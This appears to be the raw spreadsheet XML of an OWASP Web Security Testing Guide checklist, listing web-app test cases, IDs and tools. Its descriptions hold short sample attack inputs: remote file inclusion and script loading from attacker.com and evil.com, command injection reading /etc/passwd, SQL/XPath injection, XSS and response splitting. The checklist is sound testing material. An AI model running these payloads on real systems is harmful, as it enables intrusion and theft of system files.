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user\Documents\Pentest\Varios\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="18915" windowHeight="8280"/>
  </bookViews>
  <sheets>
    <sheet name="Testing Checklist" sheetId="1" r:id="rId1"/>
  </sheets>
  <definedNames>
    <definedName name="Awareness">#REF!</definedName>
    <definedName name="EaseofExploit">#REF!</definedName>
    <definedName name="EasyofDiscovery">#REF!</definedName>
    <definedName name="FinancialDamage">#REF!</definedName>
    <definedName name="IntrusionDetection">#REF!</definedName>
    <definedName name="LossofAccountability">#REF!</definedName>
    <definedName name="LossofAvailability">#REF!</definedName>
    <definedName name="LossofConfidentiality">#REF!</definedName>
    <definedName name="LossofIntegrity">#REF!</definedName>
    <definedName name="Motive">#REF!</definedName>
    <definedName name="NonCompliance">#REF!</definedName>
    <definedName name="Opportunity">#REF!</definedName>
    <definedName name="PolicyViolation">#REF!</definedName>
    <definedName name="PopulationSize">#REF!</definedName>
    <definedName name="ReputationDamage">#REF!</definedName>
    <definedName name="result">'Testing Checklist'!$A$138:$A$140</definedName>
    <definedName name="SkillRequired">#REF!</definedName>
  </definedNames>
  <calcPr calcId="162913"/>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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="593" uniqueCount="384">
  <si>
    <t>Information Gathering</t>
  </si>
  <si>
    <t>Authentication Testing</t>
  </si>
  <si>
    <t xml:space="preserve">Authorization Testing </t>
  </si>
  <si>
    <t>Tools</t>
  </si>
  <si>
    <t>Test Name</t>
  </si>
  <si>
    <t>N/A</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>Generic login error statement check, return codes/parameter values, enumerate all possible valid userids (Login system, Forgot password)</t>
  </si>
  <si>
    <t>Testing for role/privilege manipulate the values of hidden variables. Change some param groupid=2 to groupid=1</t>
  </si>
  <si>
    <t>Test for the user inputs obtained from client-side JavaScript Objects</t>
  </si>
  <si>
    <t>Decompile, Undefined variables, Unsafe methods, Include malicious SWF (http://victim/file.swf?lang=http://evil</t>
  </si>
  <si>
    <t>Testing ORM injection is identical to SQL injection testing</t>
  </si>
  <si>
    <t>param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a&lt;html&gt;Sorry,%20System%20Down&lt;/html&gt;</t>
  </si>
  <si>
    <t>Pass</t>
  </si>
  <si>
    <t>Issues</t>
  </si>
  <si>
    <t>Result</t>
  </si>
  <si>
    <t>Not Started</t>
  </si>
  <si>
    <t>Remark</t>
  </si>
  <si>
    <t>Configuration and Deploy Management Testing</t>
  </si>
  <si>
    <t>Conduct Search Engine Discovery and Reconnaissance for Information Leakage</t>
  </si>
  <si>
    <t>Fingerprint Web Server</t>
  </si>
  <si>
    <t>Review Webserver Metafiles for Information Leakage</t>
  </si>
  <si>
    <t>Enumerate Applications on Webserver</t>
  </si>
  <si>
    <t>Fingerprint Web Application Framework</t>
  </si>
  <si>
    <t>Map Application Architecture</t>
  </si>
  <si>
    <t>Test Application Platform Configuration</t>
  </si>
  <si>
    <t>Test File Extensions Handling for Sensitive Information</t>
  </si>
  <si>
    <t>Enumerate Infrastructure and Application Admin Interfaces</t>
  </si>
  <si>
    <t>Test HTTP Methods</t>
  </si>
  <si>
    <t>Test HTTP Strict Transport Security</t>
  </si>
  <si>
    <t>Identity Management Testing</t>
  </si>
  <si>
    <t>Test Role Definitions</t>
  </si>
  <si>
    <t>Test User Registration Process</t>
  </si>
  <si>
    <t>Test Account Provisioning Process</t>
  </si>
  <si>
    <t>Testing for Account Enumeration and Guessable User Account</t>
  </si>
  <si>
    <t>Testing for Credentials Transported over an Encrypted Channel</t>
  </si>
  <si>
    <t>Testing for Privilege Escalation</t>
  </si>
  <si>
    <t>Testing for Insecure Direct Object References</t>
  </si>
  <si>
    <t>Session Management Testing</t>
  </si>
  <si>
    <t>Testing for Bypassing Session Management Schema</t>
  </si>
  <si>
    <t>Testing for Session Fixation</t>
  </si>
  <si>
    <t>Testing for Exposed Session Variables</t>
  </si>
  <si>
    <t>Testing for Cross Site Request Forgery</t>
  </si>
  <si>
    <t>Testing for Reflected Cross Site Scripting</t>
  </si>
  <si>
    <t>Testing for Stored Cross Site Scripting</t>
  </si>
  <si>
    <t>Testing for SQL Injection</t>
  </si>
  <si>
    <t>Testing PostgreSQL</t>
  </si>
  <si>
    <t>Testing for NoSQL injection</t>
  </si>
  <si>
    <t>Testing for LDAP Injection</t>
  </si>
  <si>
    <t>Testing for XML Injection</t>
  </si>
  <si>
    <t>Testing for SSI Injection</t>
  </si>
  <si>
    <t>Testing for XPath Injection</t>
  </si>
  <si>
    <t>IMAP/SMTP Injection</t>
  </si>
  <si>
    <t>Testing for Code Injection</t>
  </si>
  <si>
    <t>Testing for Local File Inclusion</t>
  </si>
  <si>
    <t>Testing for Remote File Inclusion</t>
  </si>
  <si>
    <t>Testing for Command Injection</t>
  </si>
  <si>
    <t>Error Handling</t>
  </si>
  <si>
    <t>Cryptography</t>
  </si>
  <si>
    <t>Testing for Padding Oracle</t>
  </si>
  <si>
    <t>Business logic Testing</t>
  </si>
  <si>
    <t>Test Business Logic Data Validation</t>
  </si>
  <si>
    <t>Test Ability to Forge Requests</t>
  </si>
  <si>
    <t>Test Integrity Checks</t>
  </si>
  <si>
    <t>Test for Process Timing</t>
  </si>
  <si>
    <t>Test Number of Times a Function Can be Used Limits</t>
  </si>
  <si>
    <t>Testing for the Circumvention of Work Flows</t>
  </si>
  <si>
    <t>Test Upload of Unexpected File Types</t>
  </si>
  <si>
    <t>Test Upload of Malicious Files</t>
  </si>
  <si>
    <t>Client Side Testing</t>
  </si>
  <si>
    <t>Testing for JavaScript Execution</t>
  </si>
  <si>
    <t>Testing for HTML Injection</t>
  </si>
  <si>
    <t>Testing for CSS Injection</t>
  </si>
  <si>
    <t>Testing for Cross Site Flashing</t>
  </si>
  <si>
    <t>Testing for Clickjacking</t>
  </si>
  <si>
    <t>Testing WebSockets</t>
  </si>
  <si>
    <t>Use a search engine to search for Network diagrams and Configurations, Credentials, Error message content.</t>
  </si>
  <si>
    <t>Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits. Using
"HTTP header field ordering" and "Malformed requests test".</t>
  </si>
  <si>
    <t>Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers</t>
  </si>
  <si>
    <t>Map the target application and understand the principal workflows.</t>
  </si>
  <si>
    <t>Whatweb, BlindElephant, Wappalyzer</t>
  </si>
  <si>
    <t>Identify application architecture including Web language, WAF, Reverse proxy, Application Server, Backend Database</t>
  </si>
  <si>
    <t>Understand the infrastructure elements interactions, config management for software, backend DB server, WebDAV, FTP in order to identify known vulnerabilities.</t>
  </si>
  <si>
    <t>Identify HTTP allowed methods on Web server with OPTIONS. Arbitrary HTTP Methods, HEAD access control bypass and XST</t>
  </si>
  <si>
    <t>Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.</t>
  </si>
  <si>
    <t>Validate the system roles defined within the application by creating permission matrix.</t>
  </si>
  <si>
    <t>Verify that the identity requirements for user registration are aligned
with business and security requirements:</t>
  </si>
  <si>
    <t>User account names are often highly structured (e.g. Joe Bloggs
account name is jbloggs and Fred Nurks account name is fnurks)
and valid account names can easily be guessed.</t>
  </si>
  <si>
    <t>Testing for default credentials of common applications, Testing for default password of new accounts.</t>
  </si>
  <si>
    <t>Browser</t>
  </si>
  <si>
    <t>Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection</t>
  </si>
  <si>
    <t>Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?</t>
  </si>
  <si>
    <t>Check browser history issue by clicking "Back" button after logging out. Check browser cache issue from HTTP response headers (Cache-Control: no-cache)</t>
  </si>
  <si>
    <t>Determine the resistance of the application against brute force
password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of
passwords.</t>
  </si>
  <si>
    <t>Testing for weak pre-generated questions, Testing for weak self-generated question, Testing for brute-forcible answers (Unlimited attempts?)</t>
  </si>
  <si>
    <t>Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?), Test password change (Need old password?), CSRF vulnerability ?</t>
  </si>
  <si>
    <t>Understand the primary mechanism and Identify other channels (Mobile App, Call center, SSO)</t>
  </si>
  <si>
    <t>dot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote File Inclusion.</t>
  </si>
  <si>
    <t>Access a resource without authentication?, Bypass ACL, Force browsing (/admin/adduser.jsp)</t>
  </si>
  <si>
    <t>Force changing parameter value (?invoice=123 -&gt; ?invoice=456)</t>
  </si>
  <si>
    <t>The application doesn't renew the cookie after a successfully user authentication.</t>
  </si>
  <si>
    <t>Check HTTPOnly and Secure flag, expiration, inspect for sensitive data.</t>
  </si>
  <si>
    <t>SessionID analysis prediction, unencrypted cookie transport, brute-force.</t>
  </si>
  <si>
    <t>Encryption &amp; Reuse of session Tokens vulnerabilities, Send sessionID with GET method ?</t>
  </si>
  <si>
    <t>URL analysis, Direct access to functions without any token.</t>
  </si>
  <si>
    <t>Check session timeout, after the timeout has passed, all session tokens should be destroyed or be unusable.</t>
  </si>
  <si>
    <t>Check reuse session after logout both server-side and SSO.</t>
  </si>
  <si>
    <t>The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.</t>
  </si>
  <si>
    <t>Check input forms/Upload forms and analyze HTML codes, Leverage XSS with BeEF</t>
  </si>
  <si>
    <t>Check for input validation, Replace the vector used to identify XSS, XSS with HTTP Parameter Pollution.</t>
  </si>
  <si>
    <t>Identify any form or action that allows user-supplied input to bypass Input validation and filters using HPP</t>
  </si>
  <si>
    <t>ZAP, HPP Finder (Chrome Plugin)</t>
  </si>
  <si>
    <t>Union, Boolean, Error based, Out-of-band, Time delay.</t>
  </si>
  <si>
    <t>Orascan, SQLInjector</t>
  </si>
  <si>
    <t>Identify URLs for PL/SQL web applications, Access with PL/SQL Packages, Bypass PL/SQL Exclusion list, SQL Injection</t>
  </si>
  <si>
    <t>SQLMap, Mysqloit, Power Injector</t>
  </si>
  <si>
    <t>Identify MySQL version, Single quote, Information_schema, Read/Write file.</t>
  </si>
  <si>
    <t>Comment operator (- -), Query separator (;), Stored procedures (xp_cmdshell)</t>
  </si>
  <si>
    <t>SQLMap, SQLninja, Power Injector</t>
  </si>
  <si>
    <t>Determine that the backend database engine is PostgreSQL by using the :: cast operator. Read/Write file, Shell Injection (OS command)</t>
  </si>
  <si>
    <t>SQLMap</t>
  </si>
  <si>
    <t>Enumerate the column through error-based (Group by), Obtain database schema combine with fuzzdb.</t>
  </si>
  <si>
    <t>NoSQLMap</t>
  </si>
  <si>
    <t>Identify NoSQL databases, Pass special characters (' " \ ; { } ), Attack with reserved variable name, operator.</t>
  </si>
  <si>
    <t>/ldapsearch?user=*
user=*user=*)(uid=*))(|(uid=*
pass=password</t>
  </si>
  <si>
    <t>Hibernate, Nhibernate</t>
  </si>
  <si>
    <t>Check with XML Meta Characters
', " , &lt;&gt;, &lt;!--/--&gt;, &amp;, &lt;![CDATA[ / ]]&gt;, XXE, TAG</t>
  </si>
  <si>
    <t>Check for XML error enumeration by supplying a single quote (')
Username: ‘ or ‘1’ = ‘1
Password: ‘ or ‘1’ = ‘1</t>
  </si>
  <si>
    <t>• Presense of .shtml extension
• Check for these characters
&lt; ! # = / . " - &gt; and [a-zA-Z0-9]
• include String = &lt;!--#include virtual="/etc/passwd" --&gt;</t>
  </si>
  <si>
    <t>• Identifying vulnerable parameters with special characters
(i.e.: \, ‘, “, @, #, !, |)
• Understanding the data flow and deployment structure of the client
• IMAP/SMTP command injection (Header, Body, Footer)</t>
  </si>
  <si>
    <t>Enter OS commands in the input field.
?arg=1; system('id')</t>
  </si>
  <si>
    <t>LFI with dot-dot-slash (../../), PHP Wrapper (php://filter/convert.base64-encode/resource)</t>
  </si>
  <si>
    <t>RFI from malicious URL
?page.php?file=http://attacker.com/malicious_page</t>
  </si>
  <si>
    <t>Understand the application platform, OS, folder structure, relative path and execute OS commands on a Web server.
%3Bcat%20/etc/passwd
test.pdf+|+Dir C:\</t>
  </si>
  <si>
    <t>File Upload, Stored XSS , SQL/XPATH Injection, Misconfigured servers (Tomcat, Plesk, Cpanel)</t>
  </si>
  <si>
    <t>Locate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)</t>
  </si>
  <si>
    <t>• Invalid Input / Empty inputs
• Input that contains non alphanumeric characters or query syn
tax
• Access to internal pages without authentication
• Bypassing application flow</t>
  </si>
  <si>
    <t>Compare the responses in three different states:
• Cipher text gets decrypted, resulting data is correct.
• Cipher text gets decrypted, resulting data is garbled and causes
some exception or error handling in the application logic.
• Cipher text decryption fails due to padding errors.</t>
  </si>
  <si>
    <t>Check sensitive data during the transmission:
• Information used in authentication (e.g. Credentials, PINs, Session
identifiers, Tokens, Cookies…)
• Information protected by laws, regulations or specific organizational
policy (e.g. Credit Cards, Customers data)</t>
  </si>
  <si>
    <t>Measures that might indicate the application has in-built self-defense:
• Changed responses
• Blocked requests
• Actions that log a user out or lock their account</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for data entry points or hand off points between systems or software.
• Once found try to insert logically invalid data into the application/system. </t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for guessable, predictable or hidden functionality of fields.
• Once found try to insert logically valid data into the application/system allowing the user go through the application/system against the normal busineess logic workflow. </t>
  </si>
  <si>
    <t xml:space="preserve">•Looking for parts of the application/system (components i.e. For example, input fields, databases or logs) that move, store or handle data/information.
• For each identified component determine what type of data/information is logically acceptable and what types the application/system should guard against. Also, consider who according to the business logic is allowed to insert, update and delete data/information and in each component.
• Attempt to insert, update or edit delete the data/information values with invalid data/information into each component (i.e. input, database, or log) by users that .should not be allowed per the busines logic workflow. </t>
  </si>
  <si>
    <t>• Looking for application/system functionality that may
be impacted by time. Such as execution time or actions that
help users predict a future outcome or allow one to circumvent
any part of the business logic or workflow. For example, not
completing transactions in an expected time.
• Develop and execute the mis-use cases ensuring that attackers
can not gain an advantage based on any timing.</t>
  </si>
  <si>
    <t xml:space="preserve">• Looking for methods to skip or go to steps in the application process in a different order from the designed/intended business logic flow.
• For each method develop a misuse case and try to circumvent or perform an action that is "not acceptable" per the the business logic workflow. </t>
  </si>
  <si>
    <t>• Looking for functions or features in the application or system that should not be executed more that a single time or specified number of times during the business logic workflow.
• For each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.</t>
  </si>
  <si>
    <t>• Review the project documentation and perform some exploratory testing looking for file types that should be "unsupported" by the application/system.
• Try to upload these “unsupported” files an verify that it are properly rejected.
• If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. 
PS. file.phtml, shell.phPWND, SHELL~1.PHP</t>
  </si>
  <si>
    <t xml:space="preserve">• Develop or acquire a known “malicious” file.
• Try to upload the malicious file to the application/system and verify that it is correctly rejected.
• If multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. </t>
  </si>
  <si>
    <t>Inject JavaScript code:
www.victim.com/?javascript:alert(1)</t>
  </si>
  <si>
    <t>Send malicious HTML code:
?user=&lt;img%20src='aaa'%20onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">Modify untrusted URL input to a malicious site: (Open Redirect)
?redirect=www.fake-target.site </t>
  </si>
  <si>
    <t>Burp Proxy, DOMinator</t>
  </si>
  <si>
    <t>Inject code in the CSS context :
•  www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])
•  www.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)</t>
  </si>
  <si>
    <t>External JavaScript could be easily injected in the trusted web site
www.victim.com/#http://evil.com/js.js</t>
  </si>
  <si>
    <t>Check the HTTP headers in order to understand how CORS is
used (Origin Header)</t>
  </si>
  <si>
    <t>Burp Proxy, ClickjackingTool</t>
  </si>
  <si>
    <t>Discover if a website is vulnerable by loading into an iframe, create simple web page that includes a frame containing the target.</t>
  </si>
  <si>
    <t>Analyse JavaScript code looking for how Web Messaging is implemented. How the website is restricting messages from untrusted domain and how the data is handled even for trusted domains</t>
  </si>
  <si>
    <t>Identify that the application is using WebSockets by inspecting ws:// or wss:// URI scheme.Use Google Chrome's Developer Tools to view the Network WebSocket communication. Check Origin, Confidentiality and Integrity, Authentication, Authorization, Input Sanitization</t>
  </si>
  <si>
    <t>Burp proxy, ZAP</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Wfuzz</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, Xenotix XSS</t>
  </si>
  <si>
    <t>Burp Proxy, ZAP, BeEF, XSS Proxy</t>
  </si>
  <si>
    <t>Burp Proxy, Chrome, ZAP, WebSocket Client</t>
  </si>
  <si>
    <t>Determine whether the website is storing sensitive data in the storage. XSS in localstorage 
http://server/StoragePOC.html#&lt;img src=x onerror=alert(1)&gt;</t>
  </si>
  <si>
    <t>Chrome, Firebug, Burp Proxy, ZAP</t>
  </si>
  <si>
    <t>FlashBang, Flare, Flasm, SWFScan, SWF Intruder</t>
  </si>
  <si>
    <t>Burp Proxy (SQLipy), SQLMap, Pangolin, Seclists (FuzzDB)</t>
  </si>
  <si>
    <t>Review Webpage Content for Information Leakage</t>
  </si>
  <si>
    <t>Identify Application Entry Points</t>
  </si>
  <si>
    <t>Map Execution Paths Through Application</t>
  </si>
  <si>
    <t>Test Network Infrastructure Configuration</t>
  </si>
  <si>
    <t>Test RIA Cross Domain Policy</t>
  </si>
  <si>
    <t>Test File Permission</t>
  </si>
  <si>
    <t>Test Subdomain Takeover</t>
  </si>
  <si>
    <t>Test Cloud Storage</t>
  </si>
  <si>
    <t>Review and identify any rogue file permissions
$ namei -l /PathToCheck/</t>
  </si>
  <si>
    <t>namei, ls, AccessEnum, AccessChk</t>
  </si>
  <si>
    <t>Enumerate all possible domains (previous and current). 
Identify forgotten or misconfigured domains.</t>
  </si>
  <si>
    <t>dig, recon-ng, theHarvester,Sublist3r, dnsrecon, Amass</t>
  </si>
  <si>
    <t>Google Hacking, Sitedigger, Shodan, Punkspider</t>
  </si>
  <si>
    <t>Netcraft, Nikto, Nmap</t>
  </si>
  <si>
    <t>Browser, curl, wget, Burp Suite, ZAP</t>
  </si>
  <si>
    <t>Identify hidden or obfuscated paths and functionality through the analysis of metadata files. Robots, sitemap….
Extract and map other information that could lead to better understanding of the systems at hand.</t>
  </si>
  <si>
    <t>nslookup, dig, Google Hacking, DNS tools, Nmap, Nikto, Nessus</t>
  </si>
  <si>
    <t>Review webpage comments and metadata to find any information leakage
Gather JavaScript files and review the JS code to better understand the application and to find any information leakage
Identify if source map files or other front-end debug files exist.</t>
  </si>
  <si>
    <t>Browser, curl, wget, Waybackurls, Google Maps API Scanner</t>
  </si>
  <si>
    <t>Burp proxy, ZAP, Fiddler</t>
  </si>
  <si>
    <t>Identify possible entry and injection points through request and response analysis.</t>
  </si>
  <si>
    <t>Fingerprint the components being used by the web applications.</t>
  </si>
  <si>
    <t>WSTG-INFO-01</t>
  </si>
  <si>
    <t>WSTG-INFO-02</t>
  </si>
  <si>
    <t>WSTG-INFO-03</t>
  </si>
  <si>
    <t>WSTG-INFO-04</t>
  </si>
  <si>
    <t>WSTG-INFO-05</t>
  </si>
  <si>
    <t>WSTG-INFO-06</t>
  </si>
  <si>
    <t>WSTG-INFO-07</t>
  </si>
  <si>
    <t>WSTG-INFO-08</t>
  </si>
  <si>
    <t>WSTG-INFO-10</t>
  </si>
  <si>
    <t>Browser, curl, wget, wafw00f, Nessus</t>
  </si>
  <si>
    <t>Ensure that defaults and known files have been removed.
Validate that no debugging code or extensions are left in the production environments.
Review the logging mechanisms set in place for the application.</t>
  </si>
  <si>
    <t>Browser, Nikto, Fuzzing</t>
  </si>
  <si>
    <t>Dirbust sensitive file extensions, or extensions that might contain raw data (e.g. scripts, raw data, credentials, etc.).
Validate that no system framework bypasses exist on the rules set.</t>
  </si>
  <si>
    <t>Nessus, Nikto, wget, curl</t>
  </si>
  <si>
    <t>Review Old Backup and Unreferenced Files for Sensitive Information</t>
  </si>
  <si>
    <t>Find and analyse unreferenced files that might contain sensitive information.</t>
  </si>
  <si>
    <t>Burp Proxy, dirb, gobuster, wfuzz, dirsearch</t>
  </si>
  <si>
    <t>Identify hidden administrator interfaces and functionality.</t>
  </si>
  <si>
    <t>netcat, curl, Nmap</t>
  </si>
  <si>
    <t>HOST: domain.com</t>
  </si>
  <si>
    <t>Review the HSTS header and its validity. 
curl -s -D- https://domain.com | grep -i strict</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, curl</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, Nikto</t>
  </si>
  <si>
    <t>curl, AWS CLI</t>
  </si>
  <si>
    <t>Assess that the access control configuration for the storage services is properly in place.
Read the unauthorized data, upload a new arbitrary file, Testing for Amazon S3 Bucket Misconfiguration</t>
  </si>
  <si>
    <t>Testing for Weak or Unenforced Username Policy</t>
  </si>
  <si>
    <t>WSTG-IDNT-01</t>
  </si>
  <si>
    <t>WSTG-IDNT-02</t>
  </si>
  <si>
    <t>WSTG-IDNT-03</t>
  </si>
  <si>
    <t>WSTG-IDNT-04</t>
  </si>
  <si>
    <t>WSTG-IDNT-05</t>
  </si>
  <si>
    <t>Burp Suite, ZAP</t>
  </si>
  <si>
    <t>Verify which accounts may provision other accounts and of what type.</t>
  </si>
  <si>
    <t>Browser, Burp Suite, ZAP</t>
  </si>
  <si>
    <t>Testing for Default Credentials</t>
  </si>
  <si>
    <t>Testing for Weak Lock Out Mechanism</t>
  </si>
  <si>
    <t>Testing for Bypassing Authentication Schema</t>
  </si>
  <si>
    <t>Testing for Vulnerable Remember Password</t>
  </si>
  <si>
    <t>Testing for Browser Cache Weakness</t>
  </si>
  <si>
    <t>Testing for Weak Password Policy</t>
  </si>
  <si>
    <t>Testing for Weak Security Question Answer</t>
  </si>
  <si>
    <t>Testing for Weak Password Change or Reset Functionalities</t>
  </si>
  <si>
    <t>Testing for Weaker Authentication in Alternative Channel</t>
  </si>
  <si>
    <t>WSTG-ATHN-001</t>
  </si>
  <si>
    <t>WSTG-ATHN-002</t>
  </si>
  <si>
    <t>WSTG-ATHN-003</t>
  </si>
  <si>
    <t>WSTG-ATHN-004</t>
  </si>
  <si>
    <t>WSTG-ATHN-005</t>
  </si>
  <si>
    <t>WSTG-ATHN-006</t>
  </si>
  <si>
    <t>WSTG-ATHN-007</t>
  </si>
  <si>
    <t>WSTG-ATHN-008</t>
  </si>
  <si>
    <t>WSTG-ATHN-009</t>
  </si>
  <si>
    <t>WSTG-ATHN-010</t>
  </si>
  <si>
    <t>OWASP - Web Security Testing Guide Checklist</t>
  </si>
  <si>
    <t>Check referrer whether its HTTP or HTTPs. Sending data through HTTP and HTTPS.
Assess whether any use case of the web site or application causes the server or the client to exchange credentials without encryption.</t>
  </si>
  <si>
    <t>Evaluate the account lockout mechanism’s ability to mitigate
brute force password guessing. 
Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.</t>
  </si>
  <si>
    <t>API Testing</t>
  </si>
  <si>
    <t>WSTG-APIT-01</t>
  </si>
  <si>
    <t>Testing GraphQL</t>
  </si>
  <si>
    <t>Assess that a secure and production-ready configuration is deployed.
Validate all input fields against generic attacks.
Ensure that proper access controls are applied.</t>
  </si>
  <si>
    <t>GraphQL Playground, GraphQL Voyager, sqlmap, InQL (Burp Extension), GraphQL Raider (Burp Extension), GraphQL (Add-on for OWASP ZAP)</t>
  </si>
  <si>
    <t>Testing Browser Storage</t>
  </si>
  <si>
    <t>Testing Web Messaging</t>
  </si>
  <si>
    <t>WSTG-CLNT-013</t>
  </si>
  <si>
    <t>Testing for Cross Site Script Inclusion</t>
  </si>
  <si>
    <t>Locate sensitive data across the system.
Assess the leakage of sensitive data through various techniques.</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, Hydra, Patator</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, Firefox add-on CacheViewer</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, Hydra</t>
  </si>
  <si>
    <t>Testing for Improper Error Handlinges</t>
  </si>
  <si>
    <t>Testing for Stack Traces</t>
  </si>
  <si>
    <t>Testing for Weak Transport Layer Security</t>
  </si>
  <si>
    <t>Testing for Sensitive Information Sent via Unencrypted Channels</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, Curl</t>
  </si>
  <si>
    <t>Identify SSL service, Idectify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE, LUCKY13)</t>
  </si>
  <si>
    <t>testssl.sh, nmap, sslscan, sslyze</t>
  </si>
  <si>
    <t>PadBuster, Poracle, python-paddingoracle, POET, Bletchley</t>
  </si>
  <si>
    <t>Curl, Grep, Tcpdump, Wireshark</t>
  </si>
  <si>
    <t>WSTG-CONF-01</t>
  </si>
  <si>
    <t>WSTG-CONF-02</t>
  </si>
  <si>
    <t>WSTG-CONF-04</t>
  </si>
  <si>
    <t>WSTG-CONF-03</t>
  </si>
  <si>
    <t>WSTG-CONF-05</t>
  </si>
  <si>
    <t>WSTG-CONF-06</t>
  </si>
  <si>
    <t>WSTG-CONF-07</t>
  </si>
  <si>
    <t>WSTG-CONF-08</t>
  </si>
  <si>
    <t>WSTG-CONF-09</t>
  </si>
  <si>
    <t>WSTG-CONF-10</t>
  </si>
  <si>
    <t>WSTG-CONF-11</t>
  </si>
  <si>
    <t>WSTG-ERRH-001</t>
  </si>
  <si>
    <t>WSTG-ERRH-002</t>
  </si>
  <si>
    <t>WSTG-CRYP-001</t>
  </si>
  <si>
    <t>WSTG-CRYP-002</t>
  </si>
  <si>
    <t>WSTG-CRYP-003</t>
  </si>
  <si>
    <t>WSTG-CRYP-004</t>
  </si>
  <si>
    <t>WSTG-CLNT-01</t>
  </si>
  <si>
    <t>WSTG-CLNT-02</t>
  </si>
  <si>
    <t>WSTG-CLNT-03</t>
  </si>
  <si>
    <t>WSTG-CLNT-04</t>
  </si>
  <si>
    <t>WSTG-CLNT-05</t>
  </si>
  <si>
    <t>WSTG-CLNT-06</t>
  </si>
  <si>
    <t>WSTG-CLNT-07</t>
  </si>
  <si>
    <t>WSTG-CLNT-08</t>
  </si>
  <si>
    <t>WSTG-CLNT-09</t>
  </si>
  <si>
    <t>WSTG-CLNT-10</t>
  </si>
  <si>
    <t>WSTG-CLNT-11</t>
  </si>
  <si>
    <t>WSTG-CLNT-12</t>
  </si>
  <si>
    <t>WSTG-BUSL-01</t>
  </si>
  <si>
    <t>WSTG-BUSL-02</t>
  </si>
  <si>
    <t>WSTG-BUSL-03</t>
  </si>
  <si>
    <t>WSTG-BUSL-04</t>
  </si>
  <si>
    <t>WSTG-BUSL-05</t>
  </si>
  <si>
    <t>WSTG-BUSL-06</t>
  </si>
  <si>
    <t>WSTG-BUSL-07</t>
  </si>
  <si>
    <t>WSTG-BUSL-08</t>
  </si>
  <si>
    <t>WSTG-BUSL-09</t>
  </si>
  <si>
    <t>WSTG-INPV-01</t>
  </si>
  <si>
    <t>WSTG-INPV-02</t>
  </si>
  <si>
    <t>WSTG-INPV-04</t>
  </si>
  <si>
    <t>WSTG-INPV-05</t>
  </si>
  <si>
    <t>WSTG-INPV-06</t>
  </si>
  <si>
    <t>WSTG-INPV-07</t>
  </si>
  <si>
    <t>WSTG-INPV-08</t>
  </si>
  <si>
    <t>WSTG-INPV-09</t>
  </si>
  <si>
    <t>WSTG-INPV-10</t>
  </si>
  <si>
    <t>WSTG-INPV-11</t>
  </si>
  <si>
    <t>WSTG-INPV-12</t>
  </si>
  <si>
    <t>WSTG-INPV-13</t>
  </si>
  <si>
    <t>WSTG-INPV-14</t>
  </si>
  <si>
    <t>WSTG-INPV-15</t>
  </si>
  <si>
    <t>WSTG-INPV-16</t>
  </si>
  <si>
    <t>WSTG-INPV-17</t>
  </si>
  <si>
    <t>WSTG-INPV-18</t>
  </si>
  <si>
    <t>WSTG-INPV-19</t>
  </si>
  <si>
    <t>WSTG-ATHZ-01</t>
  </si>
  <si>
    <t>WSTG-ATHZ-02</t>
  </si>
  <si>
    <t>WSTG-ATHZ-03</t>
  </si>
  <si>
    <t>WSTG-ATHZ-04</t>
  </si>
  <si>
    <t>Testing Directory Traversal File Include</t>
  </si>
  <si>
    <t>Testing for Bypassing Authorization Schema</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, Wfuzz, Dirbuster, DotDotPwn</t>
  </si>
  <si>
    <t>WSTG-SESS-01</t>
  </si>
  <si>
    <t>WSTG-SESS-02</t>
  </si>
  <si>
    <t>WSTG-SESS-03</t>
  </si>
  <si>
    <t>WSTG-SESS-04</t>
  </si>
  <si>
    <t>WSTG-SESS-05</t>
  </si>
  <si>
    <t>WSTG-SESS-06</t>
  </si>
  <si>
    <t>WSTG-SESS-07</t>
  </si>
  <si>
    <t>WSTG-SESS-08</t>
  </si>
  <si>
    <t>WSTG-SESS-09</t>
  </si>
  <si>
    <t>Testing for Session Puzzling</t>
  </si>
  <si>
    <t>Testing for Session Hijacking</t>
  </si>
  <si>
    <t>Burp Suite, burpy, ZAP</t>
  </si>
  <si>
    <t>Testing for Logout Functionality</t>
  </si>
  <si>
    <t>Testing for Cookies Attributes</t>
  </si>
  <si>
    <t>Testing Session Timeout</t>
  </si>
  <si>
    <t>Burp Suite, ZAP, JHijack</t>
  </si>
  <si>
    <t>An attacker who gets access to user session cookies can impersonate them by presenting such cookies. This attack is known as session hijacking</t>
